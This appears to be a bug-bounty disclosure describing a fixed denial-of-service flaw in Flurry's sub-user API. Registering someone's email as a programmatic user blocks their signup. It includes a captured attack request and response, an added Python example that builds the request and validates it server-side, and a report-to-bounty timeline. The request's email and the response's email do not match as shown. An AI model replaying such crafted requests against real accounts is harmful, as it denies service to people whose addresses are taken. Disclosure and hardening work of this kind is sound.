DoS attack on Yahoo: how I was able to deny new users service

Sub-Users feature
  • Invite a sub-user with customized permissions
  • Create a programmatic user with API permissions
Request (creating a programmatic sub-user):

PATCH /pulse/v1/ HTTP/2
Host: ecto.flurry.com

[
  {
    "op": "add",
    "path": "user",
    "value": {
      "type": "user",
      "id": "5b1b8f87-9d79-4516-8576-f77e4411a46a",
      "attributes": {
        "email": "354732_bd6adce9-2118-4fb9-a043-009f49968553@programmatic.flurry.com",
        "programmatic": "true"
      }
    }
  },
  {
    "op": "add",
    "path": "user/5b1b8f87-9d79-4516-8576-f77e4411a46a/memberships",
    "value": {
      "type": "membership",
      "id": "f3ca1d13-12d1-4b0c-8faa-fc14ffb499a3",
      "attributes": {
        "role": "NONE",
        "title": "*",
        "productRoles": {
          "Analytics": "VIEWER",
          "AppSpot": "VIEWER",
          "AdAnalytics": "NONE",
          "RawDataDownload": "DEV",
          "GDPRDataSubjectRights": "NONE"
        }
      },
      "relationships": {
        "company": {"data": [{"type": "company", "id": "354732"}]},
        "user": {"data": [{"type": "user", "id": "5b1b8f87-9d79-4516-8576-f77e4411a46a"}]}
      }
    }
  }
]

Response:

HTTP/2 200 OK

[
  {
    "data": {
      "type": "user",
      "id": "482035",
      "attributes": {
        "email": "mostafa@gmail.com",
        "firstName": null,
        "lastName": null,
        "programmatic": true
      },
      "relationships": {
        "memberships": {"data": [{"type": "membership", "id": "547510"}]}
      }
    }
  },
  {
    "data": {
      "type": "membership",
      "id": "547510",
      "attributes": {
        "creationDate": null,
        "limitAccess": false,
        "limitedAccessProjects": [],
        "primaryMembership": false,
        "productRoles": {
          "Analytics": "VIEWER",
          "AppSpot": "VIEWER",
          "AdAnalytics": "NONE",
          "RawDataDownload": "DEV",
          "GDPRDataSubjectRights": "NONE"
        },
        "role": "NONE",
        "title": "Cairo programmatic 90477"
      },
      "relationships": {
        "company": {"data": {"type": "company", "id": "354732"}},
        "user": {"data": {"type": "user", "id": "482035"}}
      }
    }
  }
]
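The exchange above lets the caller submit the `email` and `programmatic` attributes, plus client-chosen `id` values, in a JSON-Patch-style body; the server answers with its own numeric ids. The following is an added example, not code from the original post or from Flurry: it builds the same two `add` ops, parses the JSON:API-style response, and shows the kind of server-side check a practitioner would want on this endpoint. The validation policy it enforces (client-supplied ids are discarded, a programmatic address must sit in the caller's own `<companyId>_<uuid>@programmatic.flurry.com` namespace, and a membership may only target the caller's company) is an assumption inferred from the shape of the captured request, not something the page states Yahoo implemented or identifies as the bug. The sample response is constructed from the capture on the page.

```python
"""Build, parse and server-side-validate the Flurry sub-user PATCH exchange.

Added example; the validation policy is an assumed hardening, not the page's
account of the fix.
"""
import json
import re
import uuid

PROGRAMMATIC_DOMAIN = "programmatic.flurry.com"  # domain seen in the captured request

DEFAULT_PRODUCT_ROLES = {
    "Analytics": "VIEWER",
    "AppSpot": "VIEWER",
    "AdAnalytics": "NONE",
    "RawDataDownload": "DEV",
    "GDPRDataSubjectRights": "NONE",
}

# Constructed sample: the response body shown on the page, straight-quoted.
SAMPLE_RESPONSE = json.dumps([
    {"data": {"type": "user", "id": "482035",
              "attributes": {"email": "mostafa@gmail.com", "firstName": None,
                             "lastName": None, "programmatic": True},
              "relationships": {"memberships": {"data": [{"type": "membership", "id": "547510"}]}}}},
    {"data": {"type": "membership", "id": "547510",
              "attributes": {"role": "NONE", "title": "Cairo programmatic 90477",
                             "productRoles": DEFAULT_PRODUCT_ROLES},
              "relationships": {"company": {"data": {"type": "company", "id": "354732"}},
                                "user": {"data": {"type": "user", "id": "482035"}}}}},
])


def build_programmatic_user_ops(company_id, email, product_roles=None,
                                user_id=None, membership_id=None):
    """Client side: the two 'add' ops in the shape of the captured request.
    Ids are chosen client-side here, exactly as the capture does."""
    user_id = user_id or str(uuid.uuid4())
    membership_id = membership_id or str(uuid.uuid4())
    roles = dict(product_roles or DEFAULT_PRODUCT_ROLES)
    return [
        {"op": "add", "path": "user",
         "value": {"type": "user", "id": user_id,
                   "attributes": {"email": email, "programmatic": "true"}}},
        {"op": "add", "path": f"user/{user_id}/memberships",
         "value": {"type": "membership", "id": membership_id,
                   "attributes": {"role": "NONE", "title": "*", "productRoles": roles},
                   "relationships": {
                       "company": {"data": [{"type": "company", "id": company_id}]},
                       "user": {"data": [{"type": "user", "id": user_id}]}}}},
    ]


def parse_created(response_json):
    """Pull the server-assigned user/membership ids, email and company out of the response."""
    created = {}
    for item in json.loads(response_json):
        data = item["data"]
        if data["type"] == "user":
            created["user_id"] = data["id"]
            created["email"] = data["attributes"]["email"]
        elif data["type"] == "membership":
            created["membership_id"] = data["id"]
            created["company_id"] = data["relationships"]["company"]["data"]["id"]
    return created


def programmatic_email_pattern(company_id):
    """Assumed namespace for programmatic addresses: <companyId>_<uuid>@programmatic.flurry.com."""
    return re.compile(rf"^{re.escape(company_id)}_[0-9a-f-]{{36}}@{re.escape(PROGRAMMATIC_DOMAIN)}$")


def validate_programmatic_user_ops(ops, caller_company_id):
    """Server side (assumed policy). Returns (errors, sanitized_ops).

    Client-supplied ids are dropped so the server assigns its own; a programmatic
    user's email must be in the caller's namespace; memberships may only be
    attached to the caller's own company."""
    errors, sanitized = [], []
    pattern = programmatic_email_pattern(caller_company_id)
    for op in ops:
        value = json.loads(json.dumps(op["value"]))  # deep copy; never mutate caller input
        value.pop("id", None)  # ids are server-assigned, whatever the client sent
        if op["path"] == "user":
            attrs = value.get("attributes", {})
            email = attrs.get("email", "")
            if str(attrs.get("programmatic")).lower() == "true" and not pattern.match(email):
                errors.append(f"programmatic email {email!r} is outside "
                              f"{caller_company_id}_<uuid>@{PROGRAMMATIC_DOMAIN}")
        elif op["path"].startswith("user/") and op["path"].endswith("/memberships"):
            for company in value["relationships"]["company"]["data"]:
                if company["id"] != caller_company_id:
                    errors.append(f"membership targets company {company['id']}, "
                                  f"caller is {caller_company_id}")
        else:
            errors.append(f"unexpected path {op['path']!r}")
        sanitized.append({"op": op["op"], "path": op["path"], "value": value})
    return errors, sanitized
```

Run against the page's own data, `parse_created(SAMPLE_RESPONSE)` returns the numeric ids `482035` and `547510`, i.e. the server did not honour the UUIDs the client sent; the validator accepts the `354732_<uuid>@programmatic.flurry.com` address from the request and, under the assumed policy, rejects a programmatic user whose address is an arbitrary external mailbox.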
  • December 17, 2019 — Bug reported
  • December 21, 2019 — Bug triaged
  • January 28, 2020 — Bug resolved
  • February 12, 2020 — Bounty rewarded: $1000

Mostafa Mamdoh

I’m a Penetration Tester, Bug Hunter @ HackerOne